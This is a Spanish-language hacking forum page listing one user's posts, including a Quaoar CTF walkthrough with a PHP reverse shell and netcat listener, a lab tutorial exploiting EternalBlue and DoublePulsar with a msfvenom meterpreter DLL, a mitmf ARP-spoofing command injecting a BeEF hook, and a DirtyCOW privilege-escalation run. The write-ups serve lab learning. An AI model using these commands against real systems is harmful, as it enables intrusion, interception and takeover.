Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Stuxnet

#1
la membrecia es opcional, un 90% del contenido es gratuito
#2

Hola underc0de xD después de años sin publicar nada :v espero que no lo tomen como spam :3


La plataforma desarrolla aulas virtuales que no solo permiten a los usuarios implementar entornos de formación con solo hacer clic en un botón, sino también reforzar el aprendizaje mediante la adición de un enfoque de preguntas y respuestas. Es una experiencia cómoda para aprender mediante cursos prediseñados que incluyen máquinas virtuales (VM) hospedadas en la nube.

Mientras que el uso de un modelo de preguntas-respuesta hace que el aprendizaje sea más fácil, TryHackMe permite a los usuarios crear sus propias aulas virtuales para enseñar temas particulares que les permiten convertirse en profesores. Esto no sólo proporciona a otros usuarios contenido rico y variado, sino que también ayuda a los creadores a reforzar su comprensión de los conceptos fundamentales.

TryHackMe es muy adecuado para cualquier tipo de CTF, talleres y evaluaciones de formación, la plataforma está siendo utilizada por un concurso de la Universidad del Reino Unido llamado "HackBack", sólo una de las 12 universidades diferentes que TryHackMe ha participado!

Los concursos se centran en varias categorías de seguridad, entre ellas:


  • Explotación Web
    Forense
    OSINT
    Scripting
    Redes
    Ingeniería inversa

Algunas organizaciones privadas están utilizando la plataforma para evaluar a los entrevistados sobre su capacidad y para ayudarles a poner en la lista blanca a los empleados potenciales.

Completar las salas contribuye a completar "Objetivos", que son objetivos establecidos por TryHackMe. Por ejemplo, algunas salas pueden ayudar a prepararse para el examen OSCP.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Porque tryhackme y no hack the box (Que es otra excelente opción) Pues como menciono en el post lo que busca es que usuarios nuevos aprendan desde lo basico.


PD: Un saludo para todo los que conocen ): los extraño ..... xD
#3
Dudas y pedidos generales / Re:Error vmware
Diciembre 17, 2017, 10:04:29 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#4
Off Topic / Ekoparty
Septiembre 24, 2017, 02:07:56 PM
Bien, este año me ire para la eko, asi que por si alguien más va y se pueda cuadrar un almuerzo o algunos retos sería perfecto.

telegram: @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un saludo.

#5
Para los amantes de nmap aqui esta el script nse que identifica este bug

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#6

En este tutorial vamos a resolver la maquina virtual hackfest2016: Quaoar la cual la pueden descargar desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Viendo la descripción de la maquina virtual pide que encontremos 3 flags.

Código: text
There are 3 flags on this machine 

1. Get a shell
2. Get root access
3. There is a post exploitation flag on the box


Código: text
Laboratorio:
Atacante Kali: 192.168.1.100
Victima Quaoar: 192.168.1.101


Escaneo:


Como vemos tenemos un apache corriendo en el 80.


Buscando directorios con nmap


Genial tenemos un wordpress. Ahora le pasare un scanner conocido como No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Al poco tiempo del scaneo nos mostrará que el sitio esta utilizando contraseñas por defecto que serian admin:admin así que vamos a omitir cualquier explotación de vulnerabilidades web y obtendremos acceso al equipo mediante una reverse shell en php.

Ingresando al administrador del blog

Código: text
user: admin
password:admin


Una vez echo esto, nos vamos al appearance --> editor  --> 404.php, la página 404 es la que tendra la reverse shell que voy a utilizar que será una de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.


Procedemos a modificar la reverse shell.

Código: text
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS


IP Atacante: 192.168.1.100
Por: lo dejare por defecto.

Ahora pondremos a la escucha nuestro netcat

Código: text
nc -v -n -l -p 1234


Al ingresar a la dirección de la página 404 obtendremos acceso al sistema, la url seria No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. twentyfourteen es el theme que se esta utilizando en el sitio.


Flag: 1. Get a shell


Con el comando locate voy a buscar el archivo flag.txt, al hacer eso nos dice que se encuentra en la carpeta /home/wpadmin/, después solo vere su contenido con el comando cat.

Flag 2. Get root access

Como el sitio esta en wordpress se me ocurrio hacerle un cat al archivo wp-config.php muchas veces colocan por ahi la password root


Genial la contraseña es: rootpassword!

Ahora voy a obtener una bash con el siguiente comando.

Código: text
python -c 'import pty;pty.spawn("/bin/bash")'



Yeaaa! como podemos ver, en la carpeta root se encuentra la segunda flag.

Flag 3. There is a post exploitation flag on the box.

Sin duda esta fué la que me tomo más tiempo, para encontra esta flag utilice de recurso No tienes permitido ver los links. Registrarse o Entrar a mi cuenta después de un rato leyendo el repositorio hago un cat sobre  /etc/crontab

Código: text
Crontab es un simple archivo de texto que guarda una lista de comandos a ejecutar en un tiempo especificado por el usuario



Nada de flag ):, ahora me iré a ver la carperta cron.d en el directorio etc.


Fuck yea! Al hacerle un cat al archivo php5 que se encontraba en la carpeta nos arroja información y un texto md5 cual es la ultima flag.
#7
Solo vean esto y ya.

#8
El modulo oficial de metasploit es el siguiente
Código: php
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
, si tienes tu equipo con las actualizaciones al día ya deberias de tenerlo

Saludos,
#9
Wargames y retos / DevelReto
Junio 18, 2017, 01:33:25 PM
Hola comunidad aquí les dejo un pequeño reto que acabo de hacer, espero se diviertan esta muy entretenido, cualquier duda me hablan por mensaje. Y la solución me la envian por privado saludos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#10
Hacking / Re:Hackeando como la nsa
Abril 24, 2017, 04:05:52 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No he dicho en ningún momento que te basaras en ese paper, lo siento si no me explique bien. He dicho que muchos sitios están sacando artículos sobre explotación de Eternalblue y Doublepulsar y que el "original" me parecía más completo. Puse original entre comillas porque he visto tanto cosas bastante interesantes, que quizá ni sabían de la existencia del de Sheila a verdaderas copias descaradas.

Lo original es de este tipo que mis respetos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta :3
#11
Hacking / Re:Hackeando como la nsa
Abril 23, 2017, 08:38:47 PM
No me base en ningun sitio desde hace tiempos que hice mis pruebas, date cuenta en la generaion del payload es totalmente diferente. y si comparas la hora de la publicación es totalmente diferente pero bueno xD por esto ya no publico nada.
#12
Hacking / Hackeando como la nsa
Abril 23, 2017, 04:41:28 PM

Buenas en este pequeño post, explotaremos una vulnerabilidad de Ejecución de codigo remoto en smb de windows descubierta por la nsa.
Desde hace unos días el grupo shadowbroker ha liberado nuevos exploits que afectan windows, SWIFT etc.

Las vulnerabilidades en windows son las siguientes:


Requerimientos:

Kali linux - Atacante -- 192.168.1.100
Windows XP - Atacante -- 192.168.1.102
Windows 7  - Victima  -- 192.168.1.101

Fuzzbunch ha sido el nombre de este framework con los multiples exploits de windows "El mestasploit de la nsa". Programado en python 2.6  y utiliza una versión antigua de pywin32.

Montando nuestro laboratorio.

En windows XP instalamos python 2.6 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta recomiendo moficar el path con la ruta de la carpeta de python2.6, la version antigua de pywin32 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y ahora descargamos el leak de exploits. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Nos enfocamos en la carpeta windows y procederemos a modificar Fuzzbunch.xml Linea 19 y linea 24 colocaremos la ruta de la carpeta de Resources en mi caso C:\nsa\shadowbroker\windows\Resources y la de Logs en la 24 C:\nsa\shadowbroker\windows\Logs.

Ahora vamos a editar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta comentando las lineas 26 y 72 o si no quieren comentar unicamente creen una carpeta con el nombre listeningposts dentro de la carpeta windows.

Bien ahora desde cmd nos ubicamos en la carpeta windows y ejecutamos: python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Primero pondremos la Ip victima.
Segundo pondremos la ip atacante windows xp
Tercero pondremos no en redireccion.



Bien despues precionamos enter, y procedemos a crear un proyecto nuevo con el nombre de underc0de.



Bien ahora vamos a usar el comando "use" para ver todo el arsenal de Fuzzbunch



Bien, usaremos el exploit "EternalBlue"



Bien, ahora procedemos a dejar todo por defecto, precionando enter.



Hasta llegar a esta parte donde vamos a cambiar la opcion 0 por 1



Bien ahora seguiremos precionando enter, y si todo salio bien.



Fuuuuuuuuuuuuck yea!!! Exploiting con exito.

Bien ahora usaremos otro genial función de Fuzzbunch DoublePulsar, para inyectar remotamente una DLL maliciosa, para eso la vamos a generar con msfvenom.

Código: text
msfvenom --platform Windows -p windows/meterpreter/reverse_tcp --arch x86 -f dll LHOST=192.168.1.100 LPORT=4444 > /root/nsa.dll 


Nota: La dll se genero para la plataforma de windows x86

Ahora configuramos nuestro handler en metasploit.



Bien ahora copiamos nuestra dll a windows xp y ejecutamos lo siguiente



En mi caso dejare todo por defecto porque tengo la arquitectura x86
Bien ahora en este caso vamos a elejir la opcion 2 y luego nos pedira la ruta de nuestra dll.



Bien ahora, como siempre todo por defecto precionando enter, y si todo salio perfectamente les saldria esto



y en metasploit



fuck yeaaa!!! Sesion meterpreter sobre windows sin intervencion del usuario.

Recomendaciones.

Actualizar su sistema.
#13
Dudas y pedidos generales / Re:Fake AP easy creds
Marzo 28, 2017, 11:10:32 AM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola, leyendo lo que quieres hacer imagino que quieres hacer un punto de acceso con tu ordenador y compartir internet, prueba con esta herramienta ---> wifi pumpkin, ya nos cuentas :P

Lo puedes hacer con la herramienta antes mencionada o lo puedes hacer manualmente siguiendo este video.

#14
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Una consulta, en las paginas con https también sirve?

Intenta agregando --hsts

Código: text
mitmf --hsts --spoof --arp -i INTERFACE --gateway 192.168.1.1 --inject --js-url http://192.168.1.100:3000/hook.js


Aparte te aconsejo tener la version de Twisted 15.5.0

Código: text
pip install Twisted==15.5.0
#15
Muy bueno aunque sea c/p

Salu2
#16
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
sigo igual
apt-get install lib32stdc++6 lib32ncurses5 and lib32z1
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
E: No se ha podido localizar el paquete lib32stdc++6
E: No se pudo encontrar ningún paquete con la expresión regular «lib32stdc++6»
E: No se ha podido localizar el paquete lib32ncurses5
E: No se ha podido localizar el paquete lib32z1

Deberias realizar un apt-get update a tu sistema porque los paquetes no tienen ningun error

Código: text
root@stuxnet:~$ apt-get install lib32stdc++6 lib32ncurses5 lib32z1
Leyendo lista de paquetes... Hecho
Creando árbol de dependencias       
Leyendo la información de estado... Hecho
Se instalarán los siguientes paquetes adicionales:
  lib32gcc1 lib32tinfo5 libc6-i386
Se instalarán los siguientes paquetes NUEVOS:
  lib32gcc1 lib32ncurses5 lib32stdc++6 lib32tinfo5 lib32z1 libc6-i386
0 actualizados, 6 nuevos se instalarán, 0 para eliminar y 0 no actualizados.
Se necesita descargar 3,536 kB de archivos.
Se utilizarán 14.5 MB de espacio de disco adicional después de esta operación.
¿Desea continuar? [S/n]
#17
Nuevo local exploit para la version del kernel 4.4.0

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#18
Ya la había publicado un post sobre esto :v
#19
Noticias Informáticas / Re:Metasploitable3
Noviembre 22, 2016, 10:59:44 AM
Antes que pregunten

#20

Hace unos dias el investigador Phil Oester dio a conocer la vulnerabilidad No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) la cual nos permite elevar privilegios en sistemas linux en otras palabras, un usuario local sin privilegios podría utilizar esta vulnerabilidad para escribir y tener acceso a partes del sistema que son de otros usuarios, incluido el root.


Ya existe un exploit público en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para poder explotar dicha aprovecha. Aparte en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta se ha montado un repositorio sobre todas las pruebas de concepto. 

PoC: Exploit DirtyCOW (Ubuntu 14.04 y Ubuntu 15.10)

Comprobación de versión del Kernel con el comando uname -a

Ubuntu 14.04

Ubuntu 15.10


Una vez descargado el exploit procedemos a comentar el payload generado con msfvenom, si estamos en un sistema x86, debemos comentar el payload  para x64 y si nos encontramos en un sistema x64 seria al revés.


Compilando el exploit, esta escrito en C.

Código: text
gcc 40616.c -o 40616 -pthread


Ahora ejecutamos.

Código: text
./40616


Elevación a usuario root en Ubuntu 14.04

Elevación a usuario root en Ubuntu 15.10

Bytes:3